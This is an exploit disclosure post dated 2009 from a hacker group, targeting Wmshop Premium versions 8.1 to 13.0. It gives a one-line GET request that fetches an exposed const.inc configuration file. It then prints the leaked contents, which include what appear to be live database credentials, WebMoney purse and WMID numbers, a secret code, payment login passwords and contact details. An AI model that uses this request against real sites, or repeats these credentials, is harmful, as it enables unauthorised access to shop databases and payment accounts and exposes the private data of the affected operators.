wmshopprem-disclose.txt
Posted on 23 July 2009
< ------------------- header data start ------------------- > ### Cyber-Warrior & Security TIM - Bug Researchers Group ### # Application Name : Wmshop Premium v.8.1 - 12.0 - 13.0 # Vulnerable Type : Arbitrary Database Config Disclosure Vulnerability # Infection : SQL Info Get... # Author : Septemb0x # Script Down.& WebSite : http://s2.dosya.tc/wmshop_12.rar.html - http://s2.dosya.tc/wmshop_8.1_premium.rar.html - http://s2.dosya.tc/wmshop_13.zip.html - https://merchant.webmoney.ru/conf/purses.asp ### Cyber-Warrior & Security TIM - Bug Researchers Group ### < ------------------- header data end of ------------------- > < -- bug code start -- > EXPLOIT : http://[target]/[path]/const.inc GET TO; <? $serv_const_name="Wmshop Premium v.8.1"; $serv_const_embox="admin@ukrzona.com"; $serv_const_servname="mobil-fun.org"; $serv_const_lstcount="15"; $serv_const_commission="0.1"; $serv_const_priz="0.01"; $serv_const_shopwmz="Z520778207115"; $serv_const_shopwmr="R978996871794"; $serv_const_shopwme="E029838820099"; $serv_const_kurs_wmr="29.99"; $serv_const_kurs_wme="0.84"; $serv_const_shopwmid="223567673355"; $serv_const_secretcod_wmid="123456789"; $serv_const_robo_login="wmshop"; $serv_const_robo_pwd1="71svD6GvD"; $serv_const_robo_pwd2="p1xvG4"; $DB_NAME="extrimeal_wmshop"; $DB_USER="extrimeal_shop"; $DB_PASS="19010135"; $HOST="localhost"; $serv_const_ICQ="304080282"; $serv_const_exchange="smarket100"; $serv_const_screen="3"; $serv_const_screen_width="640"; $serv_const_screen_height="480"; $serv_const_screen_disk="100"; $serv_const_bold="1"; $serv_const_u="2"; $serv_const_block="2"; $serv_const_curl=""; ?> < -- bug code end of -- > # Greetz : BHDR & BARCOD3 & Cem & Asil Bey And All Friends... _________________________________________________________________ http://www.microsoft.com/turkiye/windows/windowslive/products/photo-gallery-edit.aspx
